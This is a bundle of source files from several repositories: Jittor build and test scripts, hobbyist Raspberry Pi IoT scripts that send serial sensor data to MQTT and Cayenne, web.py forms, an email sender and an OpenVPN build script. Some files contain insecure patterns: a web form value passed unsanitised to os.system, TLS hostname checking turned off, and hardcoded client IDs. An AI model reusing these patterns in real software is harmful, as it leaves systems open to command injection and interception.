print("avg time:", (time1 - time0) / 20)
return (time1 - time0) / 20
class TestSuperglue(unittest.TestCase):
def test(self):
if not jt.has_cuda: return
t1 = main()
os.environ["use_fp16"] = "1"
t2 = main()
os.environ["use_fp16"] = "0"
assert t1*0.55 > t2
if __name__ == "__main__":
unittest.main()
```
#### File: jittor/utils/publish.py
```python
import os
def run_cmd(cmd):
print("[run cmd]", cmd)
assert os.system(cmd) == 0
def upload_file(path):
run_cmd(f"rsync -avPu {path} jittor-web:Documents/jittor-blog/assets/build/")
def docker_task(name, build_cmd):
run_cmd(build_cmd)
run_cmd(f"sudo docker push {name}")
bname = os.path.basename(name)
run_cmd(f"sudo docker save {name}:latest -o /tmp/{bname}.tgz && sudo chmod 666 /tmp/{bname}.tgz")
upload_file(f"/tmp/{bname}.tgz")
docker_task(
"jittor/jittor-cuda-11-1",
"sudo docker build --tag jittor/jittor-cuda-11-1:latest -f script/Dockerfile_cuda11 . --network host"
)
docker_task(
"jittor/jittor",
"sudo docker build --tag jittor/jittor:latest . --network host"
)
docker_task(
"jittor/jittor-cuda",
"sudo docker build --tag jittor/jittor-cuda:latest --build-arg FROM_IMAGE='nvidia/cuda:10.2-cudnn7-devel-ubuntu18.04' . --network host"
)
docker_task(
"jittor/jittor-cuda-10-1",
"sudo docker build --tag jittor/jittor-cuda-10-1:latest --build-arg FROM_IMAGE='nvidia/cuda:10.1-cudnn7-devel-ubuntu18.04' . --network host"
)
run_cmd("ssh jittor-web Documents/jittor-blog.git/hooks/post-update")
```
#### File: python/jittor_utils/translator.py
```python
import os, json
from pathlib import Path
dirname = os.path.dirname(__file__)
jittor_root = os.path.join(dirname, "..", "..")
print(jittor_root)
all_src_md = []
for r, _, f in os.walk(jittor_root):
for fname in f:
if not fname.endswith(".src.md"): continue
all_src_md.append(os.path.realpath(os.path.join(r, fname)))
def check_is_en(src):
en_cnt = 0
for c in src: en_cnt += str.isascii(c)
return en_cnt == len(src)
def check_is_both(src):
return len(src) < 2
for mdname in all_src_md:
print(mdname)
with open(mdname, "r", encoding='utf8') as f:
src = f.read()
src = src.split("```")
en_src = []
cn_src = []
for i, s in enumerate(src):
if i%2==1:
en_src.append(s)
cn_src.append(s)
else:
en_s = []
cn_s = []
for line in s.split('\n'):
if check_is_both(line):
en_s.append(line)
cn_s.append(line)
elif check_is_en(line):
en_s.append(line)
else:
cn_s.append(line)
en_src.append("\n".join(en_s))
cn_src.append("\n".join(cn_s))
en_src = "```".join(en_src)
cn_src = "```".join(cn_src)
with open(mdname.replace(".src.md", ".md"), 'w', encoding='utf8') as f:
f.write(en_src)
with open(mdname.replace(".src.md", ".cn.md"), 'w', encoding='utf8') as f:
f.write(cn_src)
``` |
{
"source": "JittoThomas/IOT",
"score": 3
} |
#### File: IOT/MQTTupload/DORJI_Serial_to_MarkerAPI.py
```python
#this imports the libraries needed
import serial, time
#import needed modules
import urllib
import urllib2
#This sets up the serial port ttyAMA0 GPIO. baud rate is the bits per second.
port = serial.Serial("/dev/ttyAMA0", baudrate=2400)
while True:
#read buffer until cr/lf
rcv = port.readline()
rcv = rcv.rstrip("\r\n")
attributes = rcv.split(",")
#for attribute in attributes:
#print(attribute)
param, key = attributes[0].split("=",1)
param, node = attributes[1].split("=",1)
param, channel = attributes[2].split("=",1)
param, data = attributes[3].split("=",1)
print(key, node, channel, data)
# Custom Functions
def send():
#API URL
url = 'http://203.118.129.73:8082/api/marker'
#place marker attributes in a dictionary
dataToSend = {
'key' : key,
'node' : node,
'channel' : channel,
'latitude' : '',
'longitude' : '',
'elevation' : '',
'data' : data
}
data_encoded = urllib.urlencode(dataToSend)
req = urllib2.Request(url, data_encoded)
response = urllib2.urlopen(req)
print response.read()
send() # excute send function
```
#### File: IOT/MQTTupload/MQTTest.py
```python
import cayenne.client
import time
# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.
MQTT_USERNAME = "a6f9ca60-aaa6-11e6-839f-8bfd46afe676"
MQTT_PASSWORD = "<PASSWORD>"
MQTT_CLIENT_ID = "377428e0-526a-11e7-aaa7-cf0a7ad22796"
# The callback for when a message is received from Cayenne.
def on_message(message):
print("message received: " + str(message))
# If there is an error processing the message return an error string, otherwise return nothing.
client = cayenne.client.CayenneMQTTClient()
client.on_message = on_message
client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)
i=0
timestamp = 0
while True:
client.loop()
if (time.time() > timestamp + 30):
client.celsiusWrite(1, i+10)
client.luxWrite(2, i*10+20)
client.hectoPascalWrite(3, i+900)
timestamp = time.time()
i = i+2
```
#### File: IOT/MQTTupload/MQTT_to_print.py
```python
import csv, os, requests
import xml.etree.cElementTree as ET
import datetime
#import pandas as pd
#import plotly.tools
#from plotly.offline import download_plotlyjs, init_notebook_mode, iplot
#init_notebook_mode()
import time, glob, paho.mqtt.client as mqtt
broker_file = '/home/administrator/MQTT_broker'
interval = 5
# Read each line of broker_file, and remove the <CR><LF> at the end of the line
broker_deets = open(broker_file,'r')
line = broker_deets.readline() # Read the comment line
line = broker_deets.readline() # IP Address or hostname of MQTT broker
broker_address =line.rstrip("\r\n")
line = broker_deets.readline() # Topic Name to use for Value One
broker_topic1 =line.rstrip("\r\n")
line = broker_deets.readline() # Topic Name to use for Value Two
broker_topic2 =line.rstrip("\r\n")
line = broker_deets.readline() # Broker username
broker_username =line.rstrip("\r\n")
line = broker_deets.readline() # Broker password VERY INSECURE!
broker_password =line.rstrip("\r\n")
broker_deets.close()
# print( broker_address, broker_topic1, broker_topic2, broker_username, broker_password)
def on_message(client, userdata, message):
print(time.ctime(time.time()))
print("message received " ,message.payload)
txt_this = open("txt_this.txt","a+")
txt_this.write("ok")
txt_this.write('\n')
txt_this.append(message.payload)
# print("message qos=",message.qos)
# print("message retain flag=",message.retain)
# Program starts here
# Connect to the broker
broker = mqtt.Client()
broker.username_pw_set(broker_username, broker_password)
broker.connect(broker_address)
broker.subscribe([(broker_topic1,1),(broker_topic2,1)])
broker.on_message=on_message #attach function to callback
broker.loop_start() #start the loop
Run_flag=True
while Run_flag :
try: # catch a <CTRL C>
time.sleep(1)
except KeyboardInterrupt:
Run_flag=False # Stop the loop
print('\n','Exiting app') # Send a cheery message
time.sleep(4) # Four seconds to allow sending to finish
broker.disconnect() # Disconnect from broker
broker.loop_stop() # Stop looking for messages
# ------ convert -----
csv_this = open('csv_file_this.csv','w')
#txtfile = open('/home/administrator/MQTT_broker')
#time.ctime(time.time())
#txt_data =message.payload
#message.topic
#txtfile.write('txt_data.txt\n')
```
#### File: IOT/MQTTupload/serial_mosquitto.py
```python
import time, serial, paho.mqtt.client as paho
#print( 'Opening MQTT3:',time.ctime(time.time()) )
# mosquitto settings
#broker="home.rata.co.nz"
broker="192.168.80.222"
#broker="sensor-base"
port=8884
qos=1
topic="sensor/temp"
# How often shall we write values to the Mosquitto broker? (Seconds + 1)
interval = 10
# Default location of serial port on Pi models 1 and 2
SERIAL_PORT = "/dev/ttyAMA0"
# Set some variables now, in case the error capture below wants to
# print them before the loop is first run
channel = -1
node = -1
data = -1
#This sets up the serial port specified above. baud rate is the bits per second.
sport = serial.Serial(SERIAL_PORT, baudrate=2400, timeout=1)
def on_publish(client, userdata, mid):
# print("pub ack "+ str(mid))
client.mid_value=mid
client.puback_flag=True
# Wait for publish to be acknowledged
def wait_for(client,msgType,period=0.25,wait_time=40):
#def wait_for(client,msgType,period=0.25,wait_time=40,running_loop=False):
# client.running_loop=running_loop #if using external loop
wcount=0
while True:
#print("waiting"+ msgType)
if msgType=="PUBACK":
if client.on_publish:
if client.puback_flag:
return True
time.sleep(period)
#print("loop flag ",client.running_loop)
wcount+=1
if wcount>wait_time:
print("return from wait loop taken too long")
return False
return True
def c_publish(client,topic,out_message,qos):
res,mid=client.publish(topic,out_message,qos)#publish
if res==0: #publish attempted ok
# if wait_for(client,"PUBACK"):
# if wait_for(client,"PUBACK",running_loop=True):
time.sleep(4) # wait for the publish to be acknowledged
if mid==client.mid_value:
# print("match mid ",str(mid))
client.puback_flag=False #reset flag
else:
raise SystemExit("not got correct puback mid so quitting")
# else:
# raise SystemExit("not got puback so quitting")
#####
# Everything defined - so now we can do things
#####
client= paho.Client(topic.replace('/','-'))
client.tls_set('/home/mosquitto/certs/m2mqtt_srv.crt')
client.tls_insecure_set(True)
client.on_publish=on_publish
client.puback_flag=False #use flag in publish ack
client.mid_value=None
#print("connecting to broker ",broker)
client.connect(broker,port)#connect
client.loop_start() #start loop to process received messages
#print( 'Connected:',time.ctime(time.time()) )
# Initialise timing variables
timedata = time.time()
Run_flag=True
while Run_flag:
try: # add an exception capture once everything is working
rcv = sport.readline() #read buffer until cr/lf
rcv=rcv.decode("utf-8") #buffer read is 'bytes' in Python 3.x
#this makes it 'str'
rcv = rcv.rstrip("\r\n")
# print("Read: >" + rcv + "<", rcv.count(','))
if rcv.count(',') > 1: # Checksum check should be added here
out_message=str(int(time.time()))+":"+topic+rcv
c_publish(client,topic,out_message,qos)
# print( 'Waiting:',time.ctime(time.time()) )
while (time.time() < timedata + interval):
time.sleep(1)
timedata = time.time()
except KeyboardInterrupt:
Run_flag=False
time.sleep(4)
client.disconnect() #disconnect
client.loop_stop() #stop loop
```
#### File: IOT/MQTTupload/Serial_multi_MQTT.py
```python
import cayenne.client, time, serial
# import random
# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.
# Random Thing on Steve's Desktop
MQTT_USERNAME = "eb68ba50-7c9<PASSWORD>"
MQTT_PASSWORD = "<PASSWORD>"
MQTT_CLIENT_ID = "3677e5b0-7fa8-11e7-a5d9-9de9b49680ec"
# Steve Temperature on Andrew's desktop
# MQTT_USERNAME = "a6f9ca60-aaa6-<PASSWORD>"
# MQTT_PASSWORD = "<PASSWORD>"
# MQTT_CLIENT_ID = "53a9e530-83b2-11e7-a9f6-4b991f8cbdfd"
# Other settings that seem to be embedded in Cayenne's libraries
# MQTT_URL = "mqtt.mydevices.com"
# MQTT_PORT = "1883"
# Default location of serial port on Pi models 1 and 2
SERIAL_PORT = "/dev/ttyAMA0"
# How often shall we write values to Cayenne? (Seconds + 1)
interval = 30
# Sort out symbols
# http://www.utf8-chartable.de/unicode-utf8-table.pl?utf8=0x&unicodeinhtml=hex
POWER3 = u'\xb3'
DEG = u'\xb0' # utf code for degree
# Put our sensor metadata into a dictionary of lists
sensor_short = 0
sensor_fullname = 1
sensor_unit = 2
sensor_unitfull = 3
sensor_nodes = {
'A' : [ 'Temp', 'Temperature', DEG, 'degrees celcius' ],
'B' : [ 'Humid', 'Humidity', '%', '%' ],
'C' : [ 'Rain', 'Rainfall', 'mm', 'millimetres' ],
'D' : [ 'BaroP', 'Barametric Pressure', 'hPa', 'hectopascal' ],
'E' : [ 'Capacitance', 'Capacitance', 'F', 'farad' ],
'F' : [ 'Wght', 'Weight', 'g', 'grammes' ],
'G' : [ 'Light', 'Light', 'lx', 'lux' ],
'H' : [ 'Density', 'Density (mass)', 'g/cm'+POWER3, 'grammes per cubic centimetre' ],
'I' : [ 'NodeI', 'Node I sensor data', 'I', 'Units of node I' ],
'J' : [ 'NodeJ', 'Node J sensor data', 'J', 'Units of node J' ],
}
# Set some variables now, in case the error capture below wants to
# print them before the loop is first run
channel = -1
node = -1
data = -1
#This sets up the serial port specified above. baud rate is the bits per second.
port = serial.Serial(SERIAL_PORT, baudrate=2400, timeout=1)
# The callback for when a message is received from Cayenne.
def on_message(message):
time.sleep(1)
# print("reply back, message received: " + str(message))
# If there is an error processing the message return an error string, otherwise return nothing.
print 'Starting:',time.ctime(time.time())
client = cayenne.client.CayenneMQTTClient()
client.on_message = on_message
client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)
print 'Connected:',time.ctime(time.time())
timestamp = 0
while True:
# try: # add an exception capture once everything is working
rcv = port.readline() #read buffer until cr/lf
rcv = rcv.rstrip("\r\n")
print("Read: >" + rcv + "<")
if len(rcv) > 5: # Checksum check should be added here
# Channel = alpha, data2 = 0-255, checksum,
channel,node,data = rcv.split(",")
# channel,node,data,chksum = rcv.split(",")
# print("rcv: " + channel + node + data )
details = sensor_nodes.get(node)
if node == 'A':
data = int(data)/10
client.celsiusWrite(1, data)
client.loop()
# elif node == 'B':
# print 'Current', details[sensor_fullname], 'is', str(data)+details[sensor_unit]
print 'Waiting:',time.ctime(time.time())
while (time.time() < timestamp + interval):
time.sleep(1)
timestamp = time.time()
# print(timestamp)
# except ValueError:
# print("opps..."+"rcv: " + channel + node + data)
```
#### File: IOT/readsensors/gmailTest.py
```python
dataFile = '/home/pi/EmailConfig'
def send_mail(gmailUser, gmailPassword, fromAddress, recipient, message, subject ):
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
msg = MIMEMultipart()
msg['From'] = fromAddress
msg['To'] = recipient
msg['Subject'] = subject
msg.attach(MIMEText(message))
mailServer = smtplib.SMTP('smtp.gmail.com', 587)
mailServer.ehlo()
mailServer.starttls()
mailServer.ehlo()
mailServer.login(gmailUser, gmailPassword)
mailServer.sendmail(gmailUser, recipient, msg.as_string())
mailServer.close()
fileContent = open(dataFile,'r') # Open the config file for reading
comment = fileContent.readline() # First line is ignored
gmailUser = fileContent.readline() # Gmail User Name to use
gmailPassword = fileContent.readline() # Gmail password
fromAddress = fileContent.readline() # From Address
recipient = fileContent.readline() # Recipient to send message to
subject = fileContent.readline() # Subject Text
message = fileContent.readline() # Message to send
fileContent.close()
send_mail(gmailUser, gmailPassword, fromAddress, recipient, message, subject )
```
#### File: IOT/webpy/form2.py
```python
import web, os
from web import form
# web.config.debug = True
render = web.template.render('templates/') # your templates
urls = (
'/', 'register'
)
OutputPath='/var/www/html/OSM/temp/'
entries = os.listdir('./archive.old')
# entries = os.listdir('/home/cosste/CayMQTT')
register_form = form.Form(
form.Dropdown(name='fileName', args=entries),
# form.Checkbox('fileName', value="file" ),
form.Button("submit", type="submit", description="Select File")
)
class register:
def GET(self):
# do $:f.render() in the template
web.header('Content-Type', 'text/html')
f = register_form()
return render.register(f)
def POST(self):
web.header('Content-Type', 'text/html')
f = register_form()
if not f.validates():
return render.register(f)
else:
# do whatever is required for registration
ChosenFile=f["fileName"].value
# return ChosenFile
if (ChosenFile.endswith('.csv')) :
OutputFile = os.path.join(OutputPath,ChosenFile[:-4])
OutputFile = ChosenFile+'.geojason'
OutputFile = os.path.join(OutputPath,OutputFile)
os.system('python3 csv2json.py '+ChosenFile+' '+OutputFile )
return '\r\nChosenFile'
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
```
#### File: IOT/webpy/form.py
```python
import web, os
from urllib import quote
from web import form
from csv2json import to_geojson
# web.config.debug = True
render = web.template.render('templates/') # your templates
urls = (
'/', 'register'
)
OutputPath ='./temp/'
InputPath ='./archive'
TargetURL ='http://students.pcsupport.ac.nz/OSM/'
ExtOut ='.geojson'
entries = os.listdir(InputPath)
# entries = os.listdir('/home/cosste/CayMQTT')
register_form = form.Form(
form.Dropdown(name='fileName', args=entries),
# form.Checkbox('fileName', value="file" ),
form.Button("submit", type="submit", description="Select File")
)
class register:
def GET(self):
# do $:f.render() in the template
web.header('Content-Type', 'text/html')
f = register_form()
return render.register(f)
def POST(self):
web.header('Content-Type', 'text/html')
f = register_form()
if not f.validates():
return render.register(f)
else:
# process the file chosen
ChosenFile=f["fileName"].value
fileName, fileExt = os.path.splitext(ChosenFile)
if 'csv' in fileExt:
OutputFile = os.path.join(OutputPath, fileName+ExtOut)
else:
OutputFile = os.path.join(OutputPath, ChosenFile+ExtOut)
ChosenFile = os.path.join(InputPath, ChosenFile)
to_geojson(ChosenFile, OutputFile)
result = '{}?{}'.format(TargetURL,OutputFile)
# return '<a href='+TargetURL+'?'+OutputFile+'> Open '+TargetURL+'?'+OutputFile+' </a>'
raise web.seeother(result)
if __name__ == "__main__":
app = web.application(urls, globals())
app.run()
```
#### File: IOT/ZIP-v0.01/Serial_to_MQTT.py
```python
import cayenne.client, datetime, time, serial
# import random
#Delay Start
#print "Time now = ", datetime.datetime.now().strftime("%H-%M-%S")
#time.sleep(60)
#print "Starting now = ", datetime.datetime.now().strftime("%H-%M-%S")
# Cayenne authentication info. This should be obtained from the Cayenne Dashboard.
MQTT_USERNAME = "6<PASSWORD>"
MQTT_PASSWORD = "<PASSWORD>"
MQTT_CLIENT_ID = "157d1d10-69dd-11e8-84d1-4d9372e87a68"
# Other settings that seem to be embedded in Cayenne's libraries
# MQTT_URL = "mqtt.mydevices.com"
# MQTT_PORT = "1883"
# Default location of serial port on Pi models 1 and 2
#SERIAL_PORT = "/dev/ttyAMA0"
# Default location of serial port on Pi models 3 and Zero
SERIAL_PORT = "/dev/ttyS0"
# How often shall we write values to Cayenne? (Seconds + 1)
interval = 5
#This sets up the serial port specified above. baud rate is the bits per second timeout seconds
#port = serial.Serial(SERIAL_PORT, baudrate=2400, timeout=5)
#This sets up the serial port specified above. baud rate. This WAITS for any cr/lf (new blob of data from picaxe)
port = serial.Serial(SERIAL_PORT, baudrate=2400)
# The callback for when a message is received from Cayenne.
def on_message(message):
print("def on_message reply back, message received: " + str(message))
# If there is an error processing the message return an error string, otherwise returns nothing.
client = cayenne.client.CayenneMQTTClient()
client.on_message = on_message
client.begin(MQTT_USERNAME, MQTT_PASSWORD, MQTT_CLIENT_ID)
#Predefine Data Packet objects for python prior to trying to look for them :)
node = ":01"
channel = "A"
data = 123
cs = 0
while True:
try:
rcv = port.readline() #read buffer until cr/lf
#print("Serial Readline Data = " + rcv)
rcv = rcv.rstrip("\r\n")
node,channel,data,cs = rcv.split(",")
#Test Point print("rcv.split Data = : " + node + channel + data + cs)
if cs == '0':
#if cs = Check Sum is good = 0 then do the following
if channel == 'A':
data = float(data)/1
client.virtualWrite(1, data, "analog_sensor", "null")
client.loop()
if channel == 'B':
data = float(data)/1
client.virtualWrite(2, data, "analog_sensor", "null")
client.loop()
if channel == 'C':
data = float(data)/1
client.virtualWrite(3, data, "analog_sensor", "null")
client.loop()
if channel == 'D':
data = float(data)/1
client.virtualWrite(4, data, "analog_sensor", "null")
client.loop()
if channel == 'E':
data = float(data)/1
client.virtualWrite(5, data, "analog_sensor", "null")
client.loop()
if channel == 'F':
data = float(data)/1
client.virtualWrite(6, data, "analog_sensor", "null")
client.loop()
if channel == 'G':
data = float(data)/1
client.virtualWrite(7, data, "analog_sensor", "null")
client.loop()
if channel == 'H':
data = float(data)/1
client.virtualWrite(8, data, "analog_sensor", "null")
client.loop()
if channel == 'I':
data = float(data)/1
client.virtualWrite(9, data, "analog_sensor", "null")
client.loop()
if channel == 'J':
data = float(data)/1
client.virtualWrite(10, data, "analog_sensor", "null")
client.loop()
if channel == 'K':
data = float(data)/1
client.virtualWrite(11, data, "analog_sensor", "null")
client.loop()
if channel == 'L':
data = float(data)/1
client.virtualWrite(12, data, "analog_sensor", "null")
client.loop()
except ValueError:
#if Data Packet corrupt or malformed then...
print("Data Packet corrupt or malformed")
``` |
{
"source": "jittrfunc/PQCrypto-VPN",
"score": 2
} |
#### File: openvpn/build/build.py
```python
import os
import shutil
import subprocess
import re
import fileinput
import stat
import sys
import platform
OPENVPN_TGZ_NAME = '/tmp/openvpn-2.4.4.tar.gz'
OPENVPN_GUI_TGZ_NAME = '/tmp/openvpn-gui-11.tar.gz'
OPENVPN_REPO_DIRNAME = 'openvpn-2.4.4'
OPENVPN_INSTALL_EXE_NAME = 'openvpn-install-2.4.4-I601.exe'
OPENVPN_GUI_REPO_DIRNAME = 'openvpn-gui'
OPENVPN_LINUX_PREFIX = '/usr/local/openvpn'
SCRIPTDIR = os.path.dirname(os.path.realpath(__file__))
# Run an external command, block until it completes
def run_command(cmd):
print '***** Running command: %s' % ' '.join(map(str,cmd))
p = subprocess.Popen(cmd)
if p.wait() != 0:
raise RuntimeError('Command failed')
# Make directories, but if the directories exist, that's okay.
def makedirs(name):
try:
os.makedirs(name)
except OSError:
pass
# Build oqs_openssl
def build_oqs_openssl():
os.chdir(SCRIPTDIR)
if platform.system() == 'Windows':
PFX86 = os.getenv('ProgramFiles(x86)', '"C:\\Program Files (x86)"')
VSWHERE = PFX86 + '\\Microsoft Visual Studio\\Installer\\vswhere.exe'
if not os.path.exists(VSWHERE):
raise RuntimeError('Cannot locate vswhere.exe. Please make sure Visual Studio 2017 or higher is installed.')
# .rstrip() removes the trailing newline that vswhere outputs
VSINSTALLPATH = subprocess.check_output([VSWHERE, '-latest', '-property', 'installationPath']).rstrip()
VCVARSALL = '"' + VSINSTALLPATH + '\\VC\\Auxiliary\\Build\\vcvarsall.bat"'
# Duplicate the source trees for X64 and X86 builds. Delete old copies if they
# exist. Development should always happen in openssl-oqs.
if (os.path.exists('scratch\\openssl-oqs-win-x64')):
shutil.rmtree('scratch\\openssl-oqs-win-x64')
if (os.path.exists('scratch\\openssl-oqs-win-x86')):
shutil.rmtree('scratch\\openssl-oqs-win-x86')
shutil.copytree('repos\\openssl-oqs', 'scratch\\openssl-oqs-win-x64')
shutil.copytree('repos\\openssl-oqs', 'scratch\\openssl-oqs-win-x86')
os.chdir('scratch\\openssl-oqs-win-x86')
# Start the X86 build
run_command(['perl', 'Configure', 'VC-WIN32', 'no-asm', 'enable-static-engine'])
run_command(['ms\\do_ms.bat'])
# vcvarsall may change the current working directory. Remember where we were and cd back to it.
mycwd = os.getcwd()
os.system(VCVARSALL + ' x86 && cd /d ' + mycwd + ' && nmake -f ms\\ntdll.mak')
# Copy the binaries to ../oqs-openssl-win
shutil.copy('out32dll\\libeay32.dll', '..\\..\\oqs-openssl-win\\x86\\')
shutil.copy('out32dll\\ssleay32.dll', '..\\..\\oqs-openssl-win\\x86\\')
# TODO: is there a way to check that the other DLLs in
# oqs-openssl-win\x86 (e.g., vcruntime140.dll) have the right version to
# work with these openssl DLLs? somehow check that the dependencies of
# libeay32.dll and ssleay32.dll are present in the x86 folder.
# Start the x64 build
os.chdir('..\\openssl-oqs-win-x64')
run_command(['perl', 'Configure', 'VC-WIN64A', 'no-asm', 'enable-static-engine'])
run_command(['ms\\do_win64a.bat'])
mycwd = os.getcwd()
# Before running nmake, we have to run vcvarsall.bat to set the x64 env vars, in the same shell
mycwd = os.getcwd()
os.system(VCVARSALL + ' amd64 && cd /d ' + mycwd + ' && nmake -f ms\\ntdll.mak')
# Copy the binaries to ../oqs-openssl-win
shutil.copy('out32dll\\libeay32.dll', '..\\..\\oqs-openssl-win\\x64\\')
shutil.copy('out32dll\\ssleay32.dll', '..\\..\\oqs-openssl-win\\x64\\')
os.chdir('..\\..')
if platform.system() == 'Linux':
makedirs('scratch/oqs-openssl-output/openssl')
makedirs('scratch/oqs-openssl-output/ssl')
prefix = os.path.abspath('scratch/oqs-openssl-output/openssl')
openssldir = os.path.abspath('scratch/oqs-openssl-output/ssl')
os.chdir('repos/openssl-oqs')
run_command(['./config', 'shared', '--prefix='+prefix, '--openssldir='+openssldir])
run_command(['make'])
# At the point we snapped to in OQS-OpenSSL, some tests were broken unrelated
# to us, and not in a way that seems to matter. Skip running tests, now that
# run_command will raise an exception when the command fails.
# run_command(['make', 'test'])
run_command(['make', 'install'])
os.chdir('../..')
def on_error(func, path, exc_info):
"""
Error handler for ``shutil.rmtree``.
If the error is due to an access error (read only file)
it attempts to add write permission and then retries.
If the error is for another reason it re-raises the error.
Usage : ``shutil.rmtree(path, onerror=onerror)``
"""
import stat
if not os.access(path, os.W_OK):
# Is the error an access error ?
os.chmod(path, stat.S_IWUSR)
func(path)
else:
raise
def build_openvpn_linux():
os.chdir(SCRIPTDIR)
if os.path.exists('stage'):
shutil.rmtree('stage')
makedirs('stage')
stagepath = os.path.abspath('stage')
os.chdir(os.path.join('repos', OPENVPN_REPO_DIRNAME))
run_command(['autoreconf', '-i', '-f', '-v'])
if not os.path.exists("../../scratch/oqs-openssl-output/"):
print "Didn't find oqs-openssl-output directory, exiting"
sys.exit(1)
lib_path = os.path.abspath('../../scratch/oqs-openssl-output/openssl/lib')
inc_path = os.path.abspath('../../scratch/oqs-openssl-output/openssl/include')
openssl_cflags = 'OPENSSL_CFLAGS="-I' + inc_path + '"'
openssl_libs = 'OPENSSL_LIBS="-L' + lib_path + ' -Wl,-rpath='+ OPENVPN_LINUX_PREFIX + '/lib ' + ' -lssl -lcrypto"'
# we need to use os.system here so that the env vars are set correctly
os.system('./configure --prefix=' + OPENVPN_LINUX_PREFIX + ' ' + openssl_cflags + ' ' + openssl_libs + ' && make && make DESTDIR=' + stagepath + ' install')
# We need to copy our versions of libcrypto and libssl into the staging area
makedirs(stagepath + '/' + OPENVPN_LINUX_PREFIX + '/lib')
shutil.copy(lib_path + '/libcrypto.so.1.0.0', stagepath + '/' + OPENVPN_LINUX_PREFIX + '/lib')
shutil.copy(lib_path + '/libssl.so.1.0.0', stagepath + '/' + OPENVPN_LINUX_PREFIX + '/lib')
os.chdir('../..')
# Create a tarball for linux (needed to do Raspberry Pi builds)
# Temporarily disabled
# makedirs('pq-openvpn-linux')
# shutil.move('oqs-openssl-output', 'pq-openvpn-linux')
# shutil.move('openvpn-pq', 'pq-openvpn-linux')
# os.chdir('repos')
# run_command(['tar', 'czf', 'pq-openvpn-linux.tgz', 'oqs-openssl-output', OPENVPN_REPO_DIRNAME])
# os.chdir('..')
# shutil.move('pq-openvpn-linux.tgz', '../pq-openvpn-linux.tgz')
## Create a staged tarball for Linux
os.chdir('stage')
# Create placeholders for etc and log directories so they'll be created
makedirs('.' + OPENVPN_LINUX_PREFIX + '/etc')
makedirs('.' + OPENVPN_LINUX_PREFIX + '/log')
makedirs('.' + OPENVPN_LINUX_PREFIX + '/sbin')
makedirs('.' + OPENVPN_LINUX_PREFIX + '/share/doc/openvpn')
run_command(['touch', '.' + OPENVPN_LINUX_PREFIX + '/etc/.placeholder', '.' + OPENVPN_LINUX_PREFIX + '/log/.placeholder'])
# Copy initial setup script into sbin directory
shutil.copy('../initialsetup.sh', '.' + OPENVPN_LINUX_PREFIX + '/sbin')
# Copy pointer to privacy statement into doc directory
shutil.copy('../PRIVACY.txt', '.' + OPENVPN_LINUX_PREFIX + '/share/doc/openvpn')
# Copy Third Party notice into doc directory
shutil.copy('../../../ThirdPartyNotice.txt', '.' + OPENVPN_LINUX_PREFIX + '/share/doc/openvpn')
# Copy service file for systemd into the appropriate place
makedirs('etc/systemd/system')
shutil.copy('../pq-openvpn.service', 'etc/systemd/system')
# Create staged tarball
run_command(['tar', '-cz', '--group=root', '--owner=root', '-f', '../pq-openvpn-linux-staged.tar.gz', '.'])
os.chdir('..')
def build_openvpn_windows():
# Only build the Windows version if we have Windows OQS-OpenSSL binaries
os.chdir(SCRIPTDIR)
for filename in ['libeay32.dll', 'ssleay32.dll']:
for platform in ['x86', 'x64']:
fullpath = 'oqs-openssl-win/' + platform + '/' + filename
if not os.path.exists(fullpath):
print 'Skipping Windows build because ' + fullpath + ' does not exist.'
print 'To build the Windows installer, you need to build the OQS-OpenSSL fork on Windows'
print 'with this script and copy the oqs-openssl-win tree into your Linux build host.'
return
os.chdir(os.path.join('repos', OPENVPN_REPO_DIRNAME))
run_command(['autoreconf', '-i', '-v', '-f'])
run_command(['./configure'])
os.chdir('../..')
# the OpenVPN build scripts need a tarball of the same code
if os.path.exists(OPENVPN_TGZ_NAME):
os.remove(OPENVPN_TGZ_NAME)
os.chdir('repos')
run_command(['tar', 'czvvf', OPENVPN_TGZ_NAME, OPENVPN_REPO_DIRNAME])
os.chdir('..')
os.chdir(os.path.join('repos', OPENVPN_GUI_REPO_DIRNAME))
run_command(['autoreconf', '-i', '-v', '-f'])
os.chdir('../..')
if os.path.exists(OPENVPN_GUI_TGZ_NAME):
os.remove(OPENVPN_GUI_TGZ_NAME)
os.chdir('repos')
run_command(['tar', 'czvvf', OPENVPN_GUI_TGZ_NAME, OPENVPN_GUI_REPO_DIRNAME])
os.chdir('..')
# Start the build
os.chdir('repos/openvpn-build')
run_command(['./windows-nsis/build-complete'])
shutil.move("windows-nsis/" + OPENVPN_INSTALL_EXE_NAME, "../../" + OPENVPN_INSTALL_EXE_NAME)
os.chdir('../..')
######## main ##########
# Make sure the submodules have been cloned.
for reponame in ['openssl-oqs', OPENVPN_REPO_DIRNAME, 'openvpn-build', OPENVPN_GUI_REPO_DIRNAME]:
if not os.path.exists(os.path.join('repos', reponame)):
raise RuntimeError('Could not find submodule ' + reponame + '. Please use --recurse-submodules option when cloning, or use \'git submodule init\' and \'git submodule update\'.')
# (Re)create the scratch dir, switch to it
os.chdir(SCRIPTDIR)
scratch_dir = "scratch"
if os.path.exists(scratch_dir):
shutil.rmtree(scratch_dir, False, on_error)
build_oqs_openssl()
# If this is Windows, we're done
if platform.system() == 'Windows':
print "Operating system detected as Windows, building OQS-OpenSSL only"
print "The binaries in Walrus/openvpn/build/oqs-openssl-win should now be updated"
sys.exit(0)
build_openvpn_linux()
build_openvpn_windows()
print "The staged tarball provides a readily deployable set of binaries on a Linux VM to quickly"
print "bring up a VPN server. It has been tested with the Ubuntu image currently provided by Azure."
print "This installation may be usable as a client with a client configuration file instead, but this"
print "is untested, and the automatic service startup is configured to look for server.ovpn as a config file."
print "To use the staged Linux tarball, do the following as root/using sudo in your VM:"
print "1. cd /"
print "2. tar xvzf <path>/pq-openvpn-linux-staged.tar.gz"
print "3. Create /usr/local/openvpn/etc/server.ovpn and dependent cert/key files as"
print " needed."
print "4. /usr/local/openvpn/sbin/initialsetup.sh"
print ""
print "To upgrade an existing installation:"
print "1. systemctl stop pq-openvpn"
print "2. cd /"
print "3. tar xvzf <path>/pq-openvpn-linux-staged.tar.gz"
print "4. systemctl start pq-openvpn"
``` |
{
"source": "jitul9680/DS-Algo-Point",
"score": 3
} |
#### File: DS-Algo-Point/Python/balanced_parenthes_without_stack.py
```python
def isBalanced(s):
restart=True
while restart:
